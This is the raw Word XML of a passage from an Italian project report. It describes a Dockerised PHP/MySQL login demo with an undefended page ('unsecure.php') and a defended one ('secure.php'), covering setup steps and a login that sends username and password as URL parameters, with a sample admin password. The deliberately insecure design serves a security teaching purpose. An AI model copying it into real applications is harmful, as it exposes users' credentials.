        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> per la</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> gestione dell’interfaccia utente </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EC7205" w14:textId="1635B976" w:rsidR="00512F70" w:rsidRPr="00512F70" w:rsidRDefault="00512F70" w:rsidP="00512F70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00512F70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00512F70">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>: PHP per la comu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>nicazione al DB tramite query SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF8A41E" w14:textId="757155DB" w:rsidR="00512F70" w:rsidRDefault="00512F70" w:rsidP="00512F70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>: MySQL avviato separatamente e inizializzato tramite il file “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>create_db.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F6D3B0" w14:textId="23BECB3D" w:rsidR="00493B0B" w:rsidRDefault="00493B0B" w:rsidP="00512F70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Docker e Docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00493B0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Compose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>: per l’esecuzione dei container del progetto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EFF058" w14:textId="77777777" w:rsidR="00512F70" w:rsidRPr="00512F70" w:rsidRDefault="00512F70" w:rsidP="00512F70">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C59B528" w14:textId="77777777" w:rsidR="00D555E5" w:rsidRDefault="00D555E5" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="168BCFCA" w14:textId="347D7762" w:rsidR="00483468" w:rsidRDefault="00483468" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc232068341"/>
      <w:bookmarkStart w:id="7" w:name="_Toc232079408"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>REQUISITI e AVVIO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4E7F1D51" w14:textId="77777777" w:rsidR="002953E6" w:rsidRPr="00483468" w:rsidRDefault="002953E6" w:rsidP="00483468">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="074089E8" w14:textId="53C0B743" w:rsidR="00483468" w:rsidRPr="00D555E5" w:rsidRDefault="004D0DD8" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc232068342"/>
      <w:bookmarkStart w:id="9" w:name="_Toc232079409"/>
      <w:r>
        <w:t xml:space="preserve">Requisiti </w:t>
      </w:r>
      <w:r w:rsidR="00493B0B">
        <w:t xml:space="preserve">Minimi </w:t>
      </w:r>
      <w:r>
        <w:t>per il Funzionamento</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="62DF55B4" w14:textId="77777777" w:rsidR="00B61AEC" w:rsidRDefault="00B61AEC" w:rsidP="00483468">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152A0DA9" w14:textId="7B50E393" w:rsidR="00512F70" w:rsidRDefault="00B61AEC" w:rsidP="00B61AEC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>: per l’esecuzione dei container PHP e MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118ACBDA" w14:textId="76D60581" w:rsidR="00B61AEC" w:rsidRPr="00B61AEC" w:rsidRDefault="00B61AEC" w:rsidP="00B61AEC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Docker-Compose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>: per avviare facilmente i componenti del progetto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56414191" w14:textId="77777777" w:rsidR="00483468" w:rsidRDefault="00483468">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AAB378B" w14:textId="16B02364" w:rsidR="00512F70" w:rsidRDefault="004D0DD8" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc232068343"/>
      <w:bookmarkStart w:id="11" w:name="_Toc232079410"/>
      <w:r>
        <w:t>Avvio dell’Applicazione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="4995150C" w14:textId="77777777" w:rsidR="00B61AEC" w:rsidRPr="00483468" w:rsidRDefault="00B61AEC" w:rsidP="00512F70">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40AFE4EC" w14:textId="5271AF4E" w:rsidR="00512F70" w:rsidRDefault="00B61AEC" w:rsidP="00B61AEC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Avviare Docker o assicurarsi che sia già in esecuzione in background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7F0B13" w14:textId="77777777" w:rsidR="006D7692" w:rsidRDefault="00B61AEC" w:rsidP="00B61AEC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Entrare con il terminale nella cartella contenent</w:t>
      </w:r>
      <w:r w:rsidR="003C72CA">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>e il file “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003C72CA">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>docker-compose.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003C72CA">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>” (</w:t>
      </w:r>
      <w:r w:rsidR="006D7692">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>non la cartella “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D7692">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D7692">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51510022" w14:textId="3346EB18" w:rsidR="00B61AEC" w:rsidRDefault="006D7692" w:rsidP="00B61AEC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Eseguire il</w:t>
      </w:r>
      <w:r w:rsidR="00E6717B">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E6717B" w:rsidRPr="0062473F">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E6717B" w:rsidRPr="0062473F">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>-compose up -d –build</w:t>
      </w:r>
      <w:r w:rsidR="00E6717B" w:rsidRPr="00E6717B">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E6717B">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>e aspettar</w:t>
      </w:r>
      <w:r w:rsidR="00923FE4">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>e che finisca di avviare i vari componenti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B3A6EE" w14:textId="234E9BC1" w:rsidR="00923FE4" w:rsidRDefault="00923FE4" w:rsidP="00B61AEC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Accedere da browser all’indirizzo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1221AD8F" w14:textId="73ADF712" w:rsidR="00923FE4" w:rsidRPr="00C300A4" w:rsidRDefault="00C300A4" w:rsidP="00C300A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00C300A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://localhost:8080/unsecure.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C300A4">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> per l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">a pagina web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>priva di difese</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DEBC53" w14:textId="0031529B" w:rsidR="00C300A4" w:rsidRDefault="00C300A4" w:rsidP="00C300A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00ED770D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://localhost:8080/secure.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> per la pagina web con le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>difese attive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089E433C" w14:textId="3622DFEB" w:rsidR="00C300A4" w:rsidRDefault="00C300A4" w:rsidP="00C300A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">(oppure se si usa un IDE come VS Code è possibile avviare il container facendo click con il tasto destro sul file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>docker-compose.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> e selezionare “Compose Up”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0FF014" w14:textId="461569FB" w:rsidR="00C300A4" w:rsidRDefault="00C300A4" w:rsidP="00C300A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BA112EF" w14:textId="7525926C" w:rsidR="007A69C1" w:rsidRPr="007A69C1" w:rsidRDefault="007A69C1" w:rsidP="00C300A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ATTENZIONE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>: il DB ci mette circa 20 secondi ad avviarsi quindi in quel periodo, provando a fare l’accesso dalla pagina web, verrà restituito l’errore “DB Offline”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7077BC6B" w14:textId="77777777" w:rsidR="007A69C1" w:rsidRDefault="007A69C1" w:rsidP="00C300A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A3555E" w14:textId="18B957AF" w:rsidR="00C300A4" w:rsidRDefault="00C300A4" w:rsidP="00C300A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Nel caso in cui </w:t>
      </w:r>
      <w:r w:rsidR="007A69C1">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">il container sia già stato avviato ma si vuole riavviare </w:t>
      </w:r>
      <w:r w:rsidR="000610A3">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">velocemente </w:t>
      </w:r>
      <w:r w:rsidR="007A69C1">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">il </w:t>
      </w:r>
      <w:r w:rsidR="000610A3">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>DB per recuperare i dati persi si può usare il comando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665DB530" w14:textId="4326EC5F" w:rsidR="000610A3" w:rsidRPr="0062473F" w:rsidRDefault="000610A3" w:rsidP="00C300A4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0062473F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker-compose down -v &amp;&amp; docker-compose up -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B24A2A" w14:textId="77777777" w:rsidR="00512F70" w:rsidRPr="000610A3" w:rsidRDefault="00512F70">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FFE1AC7" w14:textId="77777777" w:rsidR="00512F70" w:rsidRDefault="00512F70">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6417DE64" w14:textId="77777777" w:rsidR="00756352" w:rsidRPr="000610A3" w:rsidRDefault="00756352">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CEAE53F" w14:textId="49750AF8" w:rsidR="000610A3" w:rsidRDefault="0082536D" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc232068344"/>
      <w:bookmarkStart w:id="13" w:name="_Toc232079411"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FUNZIONAMENTO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="1B54B77A" w14:textId="186440C0" w:rsidR="00715AE6" w:rsidRDefault="00756352">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>L’utente interagisce tramite un form</w:t>
      </w:r>
      <w:r w:rsidR="00715AE6">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> fittizio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> sulla pagina web che richiede username e password per l’accesso al sito</w:t>
      </w:r>
      <w:r w:rsidR="00715AE6">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3808193C" w14:textId="77777777" w:rsidR="00F601CD" w:rsidRDefault="00F601CD">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD06F36" w14:textId="5CA21EC1" w:rsidR="00715AE6" w:rsidRDefault="00F601CD" w:rsidP="00F601CD">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F601CD">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5282A74E" wp14:editId="63F1176D">
            <wp:extent cx="4800600" cy="2773391"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="14163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9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7019" cy="27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5E61" w14:textId="77777777" w:rsidR="00F601CD" w:rsidRDefault="00F601CD" w:rsidP="00F601CD">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C4D71F" w14:textId="2519FE57" w:rsidR="00715AE6" w:rsidRDefault="00715AE6">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Inserendo i dati di un utente e facendo il Login, il browser invia una richiesta GET alla stessa</w:t>
      </w:r>
      <w:r w:rsidR="0062473F">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> pagina inserendo i parametri nell’</w:t>
      </w:r>
      <w:r w:rsidR="00D333FF">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E1A8BE" w14:textId="58F20FC6" w:rsidR="00D333FF" w:rsidRDefault="00D333FF">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Es</w:t>
      </w:r>
      <w:r w:rsidR="00E92576">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>empio sul sito insicuro</w:t>
      </w:r>
      <w:r w:rsidR="006E02FD">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> inserendo i dati dell’admin, la pagina web cambierà URL in</w:t>
      </w:r>
      <w:r w:rsidR="00E92576">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C354D3C" w14:textId="021AF824" w:rsidR="00E92576" w:rsidRDefault="00E92576">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="006E02FD" w:rsidRPr="00BA182E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:8080/unsecure.php?username=admin&amp;password=Admin2026%21</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F2B0DBD" w14:textId="447B67E4" w:rsidR="006E02FD" w:rsidRDefault="006E02FD" w:rsidP="006E02FD">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E02FD">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D4D7810" wp14:editId="5C8754A8">
            <wp:extent cx="4862945" cy="3223952"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="177478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1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8268" cy="32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F2BB" w14:textId="450655D3" w:rsidR="00E92576" w:rsidRPr="000610A3" w:rsidRDefault="00E92576">
      <w:p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Questi due parametri vengono poi recuperati </w:t>
      </w:r>
      <w:r w:rsidR="00A608E6">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>da PHP e usati per effettuare la richiesta al DB e recuperare l’utente nel caso in cui username e password combacino con un utente esistente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2103EF" w14:textId="77777777" w:rsidR="0082536D" w:rsidRDefault="0082536D" w:rsidP="0082536D">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3DD4CB" w14:textId="77777777" w:rsidR="00D555E5" w:rsidRDefault="00D555E5" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BD63443" w14:textId="77777777" w:rsidR="006E02FD" w:rsidRPr="006E02FD" w:rsidRDefault="006E02FD" w:rsidP="006E02FD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
